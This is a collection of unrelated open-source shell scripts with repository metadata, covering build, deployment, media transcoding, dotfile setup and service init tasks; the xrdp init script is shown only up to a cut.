yum -y install postgresql13-devel centos-release-scl-rh llvm-devel vim git sqlite-devel
yum -y groupinstall development
yum -y install postgresql${PGMAJOR}-contrib
# Start the cluster as the postgres OS user.
su - postgres -c "pg_ctl -D /var/lib/pgsql/${PGMAJOR}/data start"
# Build and install the FDW against the installed PostgreSQL (PGXS).
git clone https://github.com/pgspider/sqlite_fdw.git
cd sqlite_fdw && make USE_PGXS=1 && make USE_PGXS=1 install
# Seed a SQLite database for the FDW to expose.
sqlite3 /tmp/sqlite_fdw.db "CREATE TABLE person (id int, name text, dob text)"
sqlite3 /tmp/sqlite_fdw.db "INSERT INTO person VALUES (1, 'John Doe', '2020-01-01')"
psql -c "create extension sqlite_fdw" postgres postgres
psql -c "CREATE SERVER sqlite_server FOREIGN DATA WRAPPER sqlite_fdw options (database '/tmp/sqlite_fdw.db');" postgres postgres
psql -c "GRANT USAGE ON FOREIGN SERVER sqlite_server TO postgres" postgres postgres
psql -c "CREATE FOREIGN TABLE fdw_test (id int, name text, dob text) SERVER sqlite_server OPTIONS (table 'person')" postgres postgres
# FIX: pass the database/user like every sibling command above -- without
# them psql connects as the current (root) user to a nonexistent database.
psql -c "select * from fdw_test;" postgres postgres
# Keep things running
tail -f /dev/null
| true |
672b8e61db336ea31416bbcb3381fc6cd2c71f34 | Shell | euevew/zksync | /sdk/zksync-crypto/build.sh | UTF-8 | 1,011 | 2.953125 | 3 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
set -e
ASM=dist/zksync-crypto-bundler_bg_asm.js
which wasm-pack || cargo install wasm-pack
# pack for bundler (!note this verion is used in the pkg.browser field)
wasm-pack build --release --target=bundler --out-name=zksync-crypto-bundler --out-dir=dist
# convert the bundler build into JS in case the environment doesn't support WebAssembly
../build_binaryen.sh
../binaryen/bin/wasm2js ./dist/zksync-crypto-bundler_bg.wasm -o $ASM
# save another copy for bg_asm import
cp ./dist/zksync-crypto-bundler.js ./dist/zksync-crypto-bundler_asm.js
# fix imports for asm
sed -i.backup "s/^import.*/\
let wasm = require('.\/zksync-crypto-bundler_bg_asm.js');/" ./dist/zksync-crypto-bundler_asm.js
sed -i.backup "s/\.js/_asm\.js/g" $ASM
# pack for browser
wasm-pack build --release --target=web --out-name=zksync-crypto-web --out-dir=dist
# pack for node.js
wasm-pack build --release --target=nodejs --out-name=zksync-crypto-node --out-dir=dist
rm dist/package.json dist/.gitignore
rm dist/*.backup
| true |
d1b60ead4bbaf975fb9634dcfe95953c45d5c67b | Shell | tanboyu/automated-ChIP-and-RNAseq-pipeline-deployment | /run_v4.sh | UTF-8 | 911 | 3.1875 | 3 | [] | no_license | #!/bin/bash
# Launch an OpenStack (nova) VM for an alignment job: boot it from a known
# image, copy the payload over, attach a scratch volume, run the remote
# pipeline, then clean up on success.
# Flavor name and scratch-disk size come from files under ~/env.
flav=$(cat ~/env/flav)
diskspace=$(cat ~/env/diskspace)
# Resolve the image ID by name (second column of `nova image-list`).
img=$(nova image-list | grep "forde_base_xorg_butterfly" | awk ' { print $2 } ');
echo "Launching VM"
nova boot --flavor "$flav" --image "$img" mike-align-vm
echo "Waiting 5min for VM to come online"
# Fixed wait -- there is no readiness poll, so boot time is assumed < 5 min.
sleep 300
# Extract the instance ID and its private IP from the nova listing.
export vm="$(nova list | grep 'mike-align-vm' | awk ' { print $2 } ')"
export hole="$(nova list | grep 'mike-align-vm' | awk ' { print $12 } ')"
export ip="$(echo $hole | sed 's/private=//g')"
echo "Transfer needed files"
eval $(ssh-agent)
scp -i ~/.ssh/mf-half.pem ~/inject.tar.gz ubuntu@"$ip":~
scp -i ~/.ssh/mf-half.pem ~/env/* ubuntu@"$ip":~
echo "Attach volumes to VM"
# Create a scratch volume of the requested size and attach it as /dev/vdc.
nova volume-create --display-name mike-align-temp "$diskspace"
vol="$(nova volume-list | grep 'mike-align-temp' | awk ' { print $2 } ')"
nova volume-attach "$vm" "$vol" /dev/vdc
# Run the remote pipeline; only tear down locally if it succeeded.
ssh -i ~/.ssh/mf-half.pem ubuntu@"$ip" './p_v4.sh' && ./clean_v4.sh
exit 0
| true |
2accd3d34832f89ec7c79795c757939ccffc5579 | Shell | severinsimmler/hcrf | /ci/travis/osx/before_deploy.sh | UTF-8 | 507 | 3.078125 | 3 | [
"BSD-2-Clause",
"BSD-2-Clause-Views"
] | permissive | #!/bin/sh
# Travis OSX pre-deploy step: select the pyenv Python, rebuild the sdist
# and wheel from scratch, and sanity-check them with twine.
set -e
# Shared helpers live two directories up; `log` and $PYTHON are assumed to
# be provided by functions.sh -- confirm if reusing elsewhere.
. $(dirname $(dirname $0))/functions.sh
# --- Using proper Python executable -----------------------------------------
log Activating pyenv
eval "$(pyenv init -)"
# Select whichever single version pyenv has installed.
pyenv shell $(pyenv versions --bare)
# --- Build and audit wheel --------------------------------------------------
log Cleaning previous build files
$PYTHON setup.py clean --all
log Building wheel with \`$PYTHON\`
$PYTHON setup.py sdist bdist_wheel
log Verifying distribution files with \`twine\`
twine check dist/*
| true |
bc85e674346a19ecaaa0e0c7cfa5070ffbeb3874 | Shell | rixed/clopinet | /compress | UTF-8 | 321 | 3.625 | 4 | [] | no_license | #!/bin/sh
dbdir=$1
if test -z "$dbdir" ; then
echo "compress what?"
exit 1
fi
find "$dbdir" -type f -name '*[0-9]' |
while read p ; do
f=$(basename "$p")
d=$(dirname "$p")
ff=$((f+1))
if test -e "$d/$ff" || test -e "$d/$ff.gz" ; then
echo "Compressing $p"
ionice -c 3 gzip --no-name -9 $p
fi
done
| true |
341757cfe1a86ffc29bff71662ca00f77548057d | Shell | mohammdali-davarzani/shell-scripts | /test_script.sh | UTF-8 | 165 | 3.171875 | 3 | [] | no_license | #!/bin/bash
# Report whether the running kernel is Linux.
kernel=$(uname -s)
# FIX: quote the expansion -- unquoted $kernel would break `[` if the
# value were empty or contained whitespace.  (Also fixed the "runnig"
# typo in the fallback message.)
if [ "$kernel" = 'Linux' ]
then
    echo "I'm happy"
    echo "we are on a linux system!"
else
    echo "Oh :( what are you running there?"
fi
| true |
672e6bf22ef770eca526191d5338982e74ac689c | Shell | ololoshka2871/or1k-spartan6-platform-xip | /hdl/scripts/mksplited_image.sh | UTF-8 | 1,060 | 4.03125 | 4 | [] | no_license | #!/bin/bash
# Arguments: $1 bootloader image file, $2 number of memory units to fill,
# $3 size of one memory unit in bytes, $4 output directory for .bmm parts.
BOOTLOADER_IMAGE=$1
FPGA_DP_MEMORY_USE=$2
MEMORY_UNIT_SIZE=$3
OUTDIR=$4
# Size of the input image in bytes (used to compute the zero padding).
BOOTLOADER_IMAGE_SIZE=`stat --printf="%s" ${BOOTLOADER_IMAGE}`
# Scratch copy of the image that gets padded to a whole number of units.
TEMPFILE=`mktemp`
# xxd_from IN_FILE OFFSET SIZE OUT_FILE
# Dump SIZE bytes of IN_FILE, starting at byte OFFSET, as a plain hex
# listing (4 bytes per line) into OUT_FILE.
function xxd_from() {
    local IN_FILE=$1
    local FROM=$2
    local SIZE=$3
    local OUT_FILE=$4
    # Quote the path arguments so names containing spaces survive.
    dd if="$IN_FILE" skip="${FROM}" bs=1 count="$SIZE" 2> /dev/null | xxd -ps -c 4 > "$OUT_FILE"
}
# chr CODE -- print the character whose byte value is CODE (0-255);
# returns status 1 for values outside the single-byte range.
function chr() {
    local code=$1
    [ "$code" -lt 256 ] || return 1
    local octal
    octal=$(printf '%03o' "$code")
    printf "\\${octal}"
}
# ord CHAR -- print the numeric byte value of CHAR.
function ord() {
    local ch=$1
    # A leading apostrophe makes printf(1) emit the character's code;
    # LC_CTYPE=C pins the byte interpretation regardless of locale.
    LC_CTYPE=C printf '%d' "'$ch"
}
# Pad the image with zeros up to FPGA_DP_MEMORY_USE whole memory units,
# then emit one hex dump per unit, named <image>-partA.bmm, -partB.bmm, ...
cat $BOOTLOADER_IMAGE > $TEMPFILE
zeros_needed=$((${MEMORY_UNIT_SIZE}*${FPGA_DP_MEMORY_USE}-${BOOTLOADER_IMAGE_SIZE}))
dd if=/dev/zero bs=$zeros_needed count=1 >> ${TEMPFILE} 2> /dev/null
# Part suffixes start at 'A' and advance one letter per unit.
START_V=`ord A`
# Turn "image.bin" into the printf pattern "image-part%s.bmm".
OUTFILE_PATTERN=`echo $(basename ${BOOTLOADER_IMAGE}) | sed 's/\..*$/-part%s.bmm/'`
for((i=0;i<${FPGA_DP_MEMORY_USE};i++)); do
value=$((${START_V}+${i}))
part_file_name=`printf $OUTFILE_PATTERN $(chr ${value})`
# Hex-dump the i-th MEMORY_UNIT_SIZE slice of the padded image.
xxd_from ${TEMPFILE} $((${MEMORY_UNIT_SIZE}*${i})) ${MEMORY_UNIT_SIZE} \
${OUTDIR}/${part_file_name}
done
#rm $TEMPFILE
| true |
5d766128c4359c679fcf894a5bff9d3143bbfdb7 | Shell | luciobian/forum-tdd | /install.sh | UTF-8 | 844 | 2.96875 | 3 | [] | no_license | # !/bin/bash
# Clone the forum-tdd Laravel project, install its PHP dependencies,
# optionally create and seed the database, run the test suite and start
# the dev server.  (User-facing messages are intentionally in Spanish.)
echo "Clonando..."
echo ""
git clone "https://github.com/luciobian/forum-tdd.git"
echo ""
echo ""
cd forum-tdd/forum
echo "Instalando dependencias.."
echo ""
composer install
# Laravel requires these directories to be writable by the web server.
chmod -R 777 storage bootstrap/cache
cp .env.example .env
php artisan key:generate
echo ""
# Wait for the operator to start the MySQL service manually.
read -p "Iniciar servicio de MySQL y luego presione ENTER para continuar" var
echo ""
# Only continue with DB setup when plain ENTER (empty input) was pressed.
if [ ${#var} -eq 0 ]; then
mysql --user="root" --password="" --execute="CREATE DATABASE laravel;"
echo ""
echo "Database 'laravel' creada..."
php artisan migrate
echo ""
echo "Tablas migradas..."
echo ""
# Seed the tables with random fixture data.
php artisan db:fill
echo "Tablas cargadas con datos aleatoreos..."
fi
echo " "
echo " "
echo "Ejecutando tests..."
echo "-----------------------"
echo ""
echo ""
vendor/bin/phpunit
echo ""
echo ""
echo "-----------------------"
# Foreground dev server; the script blocks here until interrupted.
php artisan serve
| true |
331178aab378b5fde496664f91763458338b0f8a | Shell | vmarrazzo/jmeter-swarm | /do_setup_script.sh | UTF-8 | 2,555 | 3.625 | 4 | [] | no_license | #!/bin/sh -x
# Region for the swarm manager droplet.
# This variable describe manager location
MANAGER_REGION="nyc3"
# This array describes workers location
# NOTE(review): `declare -a` is a bashism under the file's /bin/sh shebang;
# works only where /bin/sh is bash -- confirm the target environment.
declare -a WORKER_REGIONS=("ams3" "fra1" "lon1")
# DigitalOcean Access Token
export DO_TOKEN="your_digitalocean_access_token"
# Print the docker-machine options for provisioning a 1 GB Ubuntu 16.04
# DigitalOcean droplet with private networking in region $1, authenticated
# with the access token from $DO_TOKEN.
function to_do_creation(){
    local opts="--driver=digitalocean"
    opts="${opts} --digitalocean-access-token=${DO_TOKEN}"
    opts="${opts} --digitalocean-size=1gb"
    opts="${opts} --digitalocean-region=${1}"
    opts="${opts} --digitalocean-private-networking=true"
    opts="${opts} --digitalocean-image=ubuntu-16-04-x64"
    echo "$opts"
}
# Manager machine name
MANAGER_ID=manager-${MANAGER_REGION}
# Create manager machine
docker-machine create \
$(to_do_creation $MANAGER_REGION) \
--engine-label role=$MANAGER_ID \
$MANAGER_ID
# This command extract real ip address
MANAGER_IP=`docker-machine ip $MANAGER_ID`
# Init docker swarm manager on machine
docker-machine ssh $MANAGER_ID "docker swarm init --advertise-addr ${MANAGER_IP}"
# Extract a token necessary to attach workers to swarm
WORKER_TOKEN=`docker-machine ssh $MANAGER_ID docker swarm join-token worker | grep token | awk '{ print $5 }'`
# this array holds worker machine names
declare -a WORKER_IDS=()
# Iterate over worker regions
for region in "${WORKER_REGIONS[@]}"
do
# Machine name
worker_machine_name=$(echo worker-${region})
# Create worker machine
docker-machine create \
$(to_do_creation $region) \
--engine-label role=$worker_machine_name \
$worker_machine_name
WORKER_IDS+=($worker_machine_name)
# Join to Swarm as worker
docker-machine ssh ${worker_machine_name} \
"docker swarm join --token ${WORKER_TOKEN} ${MANAGER_IP}:2377"
done
# Overlay network information
SUB_NET="172.23.0.0/16"
TEST_NET=my-overlay
# Switch swarm manager machine
eval $(docker-machine env $MANAGER_ID)
# From swarm manager overlay network creation
docker network create \
-d overlay \
--attachable \
--subnet=$SUB_NET $TEST_NET
# this array is necessary to hold containers name
declare -a JMETER_CONTAINERS=()
# for each worker machine
for id in "${WORKER_IDS[@]}"
do
# for three times we create JMeter slave service
# using engine label for scheduling
for index in $(seq -f "%02g" 1 3)
do
jmeter_container_name=$(echo ${id}_${index}_jmeter)
docker service create \
--name $jmeter_container_name \
--constraint "engine.labels.role==$id" \
--network $TEST_NET \
vmarrazzo/jmeter \
-s -n \
-Jclient.rmi.localport=7000 -Jserver.rmi.localport=60000 \
-Jserver.rmi.ssl.disable=true
# save container name
JMETER_CONTAINERS+=($jmeter_container_name)
done
done
| true |
61e7ab3f7d979b5b4370680421b0bb9f77cb97ae | Shell | adamkaplan/dotfiles | /setup.sh | UTF-8 | 542 | 2.78125 | 3 | [] | no_license | #!/usr/bin/env sh
# Symlink the dotfiles in this repository into $HOME.
LN="ln -sf"        # deliberately unquoted below so the -sf flag splits off
SOURCE=$(pwd)

# Fetch vendored submodules.  FIX: the original wrapped these commands in
# backticks, which executed their (discarded, hence empty) output as a
# command -- run them directly instead.
git submodule init 1>/dev/null
git submodule update --recursive 1>/dev/null

# vim (core)
$LN "$SOURCE/dot_vim/vimrc" ~/.vimrc

# vim (pathogen)
mkdir -p ~/.vim    # -p: do not fail when the directory already exists
$LN "$SOURCE/dot_vim/autoload" ~/.vim/autoload
$LN "$SOURCE/dot_vim/bundle" ~/.vim/bundle
$LN "$SOURCE/dot_vim/ftdetect" ~/.vim/ftdetect
$LN "$SOURCE/dot_vim/indent" ~/.vim/indent
$LN "$SOURCE/dot_vim/plugin" ~/.vim/plugin
$LN "$SOURCE/dot_vim/syntax" ~/.vim/syntax

# tmux
$LN "$SOURCE/tmux.conf" ~/.tmux.conf

# oh-my-zsh
$LN "$SOURCE/zshrc" ~/.zshrc
| true |
d48a00f95ed00f1ed2c8877056a77cf8365620bd | Shell | opal/opal-rails | /bin/sandbox | UTF-8 | 941 | 3.25 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Derive this gem's name from the *.gemspec two directories above this
# script (bin/sandbox -> repo root).
gem_name="$(ruby -rpathname -e"puts Pathname(ARGV.first).join('../..').expand_path.glob('*.gemspec').first.basename('.gemspec')" -- $0)"
# Stay away from the bundler env of the containing extension.
function unbundled {
ruby -rbundler -e'b = proc {system *ARGV}; Bundler.respond_to?(:with_unbundled_env) ? Bundler.with_unbundled_env(&b) : Bundler.with_clean_env(&b)' -- $@
}
# Always rebuild the sandbox app from scratch.
rm -rf ./sandbox
# Generate a minimal Rails app; extra CLI args are forwarded to `rails new`.
unbundled bundle exec rails new sandbox \
--skip-bundle \
--skip-git \
--skip-keeps \
--skip-rc \
--skip-spring \
--skip-test \
$@
if [ ! -d "sandbox" ]; then
echo 'sandbox rails application failed'
exit 1
fi
cd ./sandbox
# Add the gem under test to the sandbox Gemfile as a path dependency.
cat <<RUBY >> Gemfile
gem '$gem_name', path: '..'
RUBY
unbundled bundle install --gemfile Gemfile
unbundled bin/rails webpacker:install
cd .. # Back to the project root.
bin/sandbox-setup # Run any custom setup.
echo
echo "🚀 Sandbox app successfully created for $gem_name!"
| true |
a970edf6edeae56ce81dd503464037bca6574d9f | Shell | codacy-badger/yals | /docker-entrypoint.sh | UTF-8 | 1,001 | 3.703125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# usage: file_env VAR [DEFAULT]
#    ie: file_env 'XYZ_DB_PASSWORD' 'example'
# Resolve VAR from either $VAR itself or the file named by $VAR_FILE
# (Docker secrets style), falling back to DEFAULT, then export VAR and
# unset VAR_FILE.  Setting both $VAR and $VAR_FILE is an error.
file_env() {
	local name=$1
	local file_name="${name}_FILE"
	local fallback=${2:-}
	# The direct value and the file-based value are mutually exclusive.
	if [ -n "${!name:-}" ] && [ -n "${!file_name:-}" ]; then
		echo >&2 "error: both $name and $file_name are set (but are exclusive)"
		exit 1
	fi
	local value=$fallback
	if [ -n "${!name:-}" ]; then
		value=${!name}
	elif [ -n "${!file_name:-}" ]; then
		# $(<file) reads the secret file (trailing newlines stripped).
		value=$(< "${!file_name}")
	fi
	export "$name"="$value"
	# Drop the *_FILE variable so it never leaks into child processes.
	unset "$file_name"
}
# Resolve secrets/config from the environment or Docker secret files.
file_env 'YALS_DB_PASSWORD'
file_env 'TELEGRAM_TOKEN'
# For DB checker
file_env 'DB_HOST' 'yals_db'
file_env 'DB_PORT' '3306'
# DB checker
# Block until the database port accepts TCP connections.
echo "Connecting to $DB_HOST:$DB_PORT"
while ! nc -z $DB_HOST $DB_PORT; do
echo "Waiting for DB..."
sleep 1
done
echo "Connected! Here we go: "
# Replace the shell with the JVM so signals reach the application directly.
exec java $JAVA_OPTS -Djava.security.egd=file:/dev/./urandom -jar /app/yals.jar
| true |
54bd9f20151558822dcdeb84aa8478e888172213 | Shell | chaoswest-tv/nginx-hls-origin-docker | /bin/hls.sh | UTF-8 | 2,204 | 2.84375 | 3 | [
"CC-BY-4.0",
"MIT"
] | permissive | #!/bin/sh
# Transcode an incoming RTMP stream ($1) into an HLS rendition ladder:
# probe the source height, enable every rung it can support, and also
# emit a once-per-second PNG thumbnail.
set -eux

NAME=${1}

# One-shot probe of the live stream; jq extracts the advertised height.
PROBE=$(ffprobe -v quiet -print_format json -show_format -show_streams "rtmp://localhost:1935/live/${NAME}")
#VIDEO_JSON=$(echo ${PROBE} | jq '.streams[] | select(.codec_type == "video")')
VIDEO_DISPLAYHEIGHT=$(echo ${PROBE} | jq -r '.format.tags.displayHeight')

# Shared x264 settings; a 30-frame GOP keeps HLS segments cleanly cuttable.
LIBX264_PRESET="-preset faster"
LIBX264_PROFILE="-profile:v main"
GOP_LENGTH="-g 30"

# Build the ladder top-down -- each rung is added only when the source is
# at least that tall.  FIX: the original used bash-only `[[ ]]` under a
# /bin/sh shebang; POSIX `[ ]` behaves identically here and, combined with
# `set -e`, no longer aborts when /bin/sh is dash/ash.
FFMPEG_VARIANTS=""
if [ "$VIDEO_DISPLAYHEIGHT" -ge 2160 ]
then
    FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 256k -c:v libx264 -b:v 15000k -f flv ${GOP_LENGTH} -vf scale=-2:2160 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_2160p15256kbs"
fi
if [ "$VIDEO_DISPLAYHEIGHT" -ge 1080 ]
then
    FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 160k -c:v libx264 -b:v 6000k -f flv ${GOP_LENGTH} -vf scale=-2:1080 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_1080p6160kbs"
fi
if [ "$VIDEO_DISPLAYHEIGHT" -ge 720 ]
then
    FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 160k -c:v libx264 -b:v 3000k -f flv ${GOP_LENGTH} -vf scale=-2:720 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_720p3160kbs"
fi
if [ "$VIDEO_DISPLAYHEIGHT" -ge 480 ]
then
    FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 128k -c:v libx264 -b:v 1500k -f flv ${GOP_LENGTH} -vf scale=-2:480 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_480p1628kbs"
fi
if [ "$VIDEO_DISPLAYHEIGHT" -ge 360 ]
then
    FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 128k -c:v libx264 -b:v 800k -f flv ${GOP_LENGTH} -vf scale=-2:360 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_360p928kbs"
fi

# The two lowest rungs are always produced.
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 96k -c:v libx264 -b:v 500k -f flv ${GOP_LENGTH} -vf scale=-2:240 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_240p596kbs"
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 64k -c:v libx264 -b:v 300k -f flv ${GOP_LENGTH} -vf scale=-2:160 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_160p364kbs"

# $FFMPEG_VARIANTS is intentionally unquoted: it must word-split into many
# individual ffmpeg arguments.  exec replaces the shell so signals reach
# ffmpeg directly.
exec ffmpeg -v info -nostats -y -i "rtmp://localhost:1935/live/${NAME}" ${FFMPEG_VARIANTS} -vf fps=1 -update 1 "/opt/data/hls/${NAME}.png"
| true |
effd7127715d17619ec08b89692303cc1978566f | Shell | juskoa/trigger | /v/vme/pydim/simple/buildso.sh | UTF-8 | 576 | 3.140625 | 3 | [] | no_license | #!/bin/bash
# Build the SWIG Python extension "_<name>.so" from <name>.i / <name>.c,
# linked against the DIM library.  $1 = extension name (default: clientpy).
nam=$1
if [ "$nam" = '' ] ;then
	cat - <<-EOF
	Usage: ./buildso.sh extension_name
	using: clientpy...
	EOF
	nam='clientpy'
fi
# create $nam_wrap.c, $nam.py:
swig -python "$nam.i"
# FIX: capture swig's status immediately -- `[ $? -ne 0 ]` itself resets
# $?, so the original always printed "swig rc:0" and exited with status 0
# even on failure.
rc=$?
if [ $rc -ne 0 ] ;then
	echo "swig rc:$rc"
	exit $rc
fi
# create $nam_wrap.o
gcc -fPIC -c "$nam.c" "${nam}_wrap.c" -I/usr/include/python2.3 \
    -I/opt/dim/dim
# create _$nam.so
#ld -shared --export-dynamic -rpath /opt/dim/linux $nam.o ${nam}_wrap.o -o _$nam.so
#ld -shared $nam.o ${nam}_wrap.o -o _$nam.so
ld -shared --export-dynamic "$nam.o" "${nam}_wrap.o" /opt/dim/linux/libdim.so -o _$nam.so
| true |
f587816ab813fef29a2993579ad0475aa53d1f35 | Shell | rcarmo/ubuntu-xrdp | /xrdp/debian/xrdp.init | UTF-8 | 7,339 | 3.609375 | 4 | [
"MIT-open-group",
"LicenseRef-scancode-warranty-disclaimer",
"FSFAP",
"HPND-sell-variant",
"LicenseRef-scancode-mit-old-style",
"MirOS",
"BSD-2-Clause-Views",
"Bitstream-Vera",
"MIT",
"LicenseRef-scancode-other-permissive",
"X11",
"GPL-2.0-or-later",
"FSFULLR",
"HPND",
"GPL-3.0-only",
"GPL-2.0-only",
"Apache-2.0",
"Autoconf-exception-macro",
"LicenseRef-scancode-unknown",
"GPL-3.0-or-later",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/bin/sh
### BEGIN INIT INFO
# Provides:          xrdp
# Required-Start:    $remote_fs $syslog $network
# Required-Stop:     $remote_fs $syslog $network
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: xrdp (X Remote Desktop Protocol) full server
# Description:       The xrdp daemon uses the Remote Desktop Protocol
#                    to present a graphical login to a remote client,
#                    allowing connections to an xorgxrdp or VNC server
#                    or another RDP server. The xrdp-sesman daemon
#                    authenticates the users against PAM and starts
#                    the session and, if necessary, X11 server.
### END INIT INFO
#-
# Copyright © 2015 mirabilos <thorsten.glaser@teckids.org>
# Published under The MirOS Licence.
# absolute basics
# Force a C locale and a known PATH so external tool output is stable.
LC_ALL=C PATH=/sbin:/usr/sbin:/bin:/usr/bin
export LC_ALL PATH
unset LANGUAGE
# exit cleanly if disabled or not installed
test -x /usr/sbin/xrdp || exit 0
# Debian/LSB init script foobar
DESC='Remote Desktop Protocol server'
NAME=xrdp
. /lib/init/vars.sh
# Interactive invocation (stdin is a tty) gets verbose progress output.
test -t 0 && VERBOSE=yes
. /lib/lsb/init-functions
# read options
SESMAN_START=yes
SESMAN_OPTIONS=
XRDP_OPTIONS=
# /etc/default/xrdp may override the three settings above.
test -r /etc/default/xrdp && . /etc/default/xrdp
# prepare for actions
# First pass over $1: validate the action and do per-action setup;
# the real work happens in the second case statement below.
case $1 in
(status)
# nothing to do here
;;
(start|stop|force-reload|restart|try-restart)
# check for root; create run-time directories
. /usr/share/xrdp/socksetup
;;
(*)
# syntax error
echo >&2 "Usage: $0 {start|stop|status|restart|try-restart|force-reload}"
exit 3
;;
esac
# take action
# rv accumulates the worst (highest) exit status seen across daemons.
rv=0
case $1 in
(start)
# Start xrdp-sesman (if enabled) and xrdp; a daemon that is already
# running is reported but not treated as an error.
test x"$VERBOSE" = x"no" || log_daemon_msg "Starting $DESC"
test x"$SESMAN_START" = x"yes" && \
if start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman --test; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman -- $SESMAN_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
else
test x"$VERBOSE" = x"no" || \
log_progress_msg "sesman already running"
fi
if start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp --test; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp -- $XRDP_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
else
test x"$VERBOSE" = x"no" || \
log_progress_msg "xrdp already running"
fi
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
(stop)
# Stop both daemons: first by pidfile+name, then a fallback pass by
# executable only (--oknodo makes "not running" a success).
test x"$VERBOSE" = x"no" || log_daemon_msg "Stopping $DESC"
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp.pid \
--name xrdp --exec /usr/sbin/xrdp
rc=$?
if test $rc -gt 1; then
rv=$rc
else
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp
rc=$?
test $rc -gt 1 && test $rv -lt $rc && rv=$rc
fi
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--name xrdp-sesman --exec /usr/sbin/xrdp-sesman
rc=$?
if test $rc -gt 1; then
rv=$rc
else
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp-sesman
rc=$?
test $rc -gt 1 && test $rv -lt $rc && rv=$rc
fi
# Clean up run-time state created by socksetup / the daemons.
rm -f /var/run/xrdp/xrdp-sesman.pid /var/run/xrdp/xrdp.pid
rm -rf /var/run/xrdp/sockdir
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
(status)
# LSB status: report the worst status of the enabled daemons.
if test x"$SESMAN_START" = x"yes"; then
status_of_proc -p /var/run/xrdp/xrdp-sesman.pid \
/usr/sbin/xrdp-sesman xrdp-sesman
rc=$?
test $rc -gt $rv && rv=$rc
fi
status_of_proc -p /var/run/xrdp/xrdp.pid /usr/sbin/xrdp xrdp
rc=$?
test $rc -gt $rv && rv=$rc
exit $rv
;;
(force-reload|restart)
# Unconditional restart: stop (pidfile pass, then fallback pass),
# remove stale pidfiles, then start again.
test x"$VERBOSE" = x"no" || log_daemon_msg "Restarting $DESC"
if test x"$SESMAN_START" = x"yes"; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--name xrdp-sesman --exec /usr/sbin/xrdp-sesman
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp-sesman
fi
rm -f /var/run/xrdp/xrdp-sesman.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman -- $SESMAN_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
fi
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp.pid \
--name xrdp --exec /usr/sbin/xrdp
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp
fi
rm -f /var/run/xrdp/xrdp.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp -- $XRDP_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
(try-restart)
# Restart only if xrdp is currently running; otherwise succeed (LSB).
test x"$VERBOSE" = x"no" || log_daemon_msg "Trying to restart $DESC"
if ! status_of_proc -p /var/run/xrdp/xrdp.pid \
/usr/sbin/xrdp xrdp >/dev/null 2>&1; then
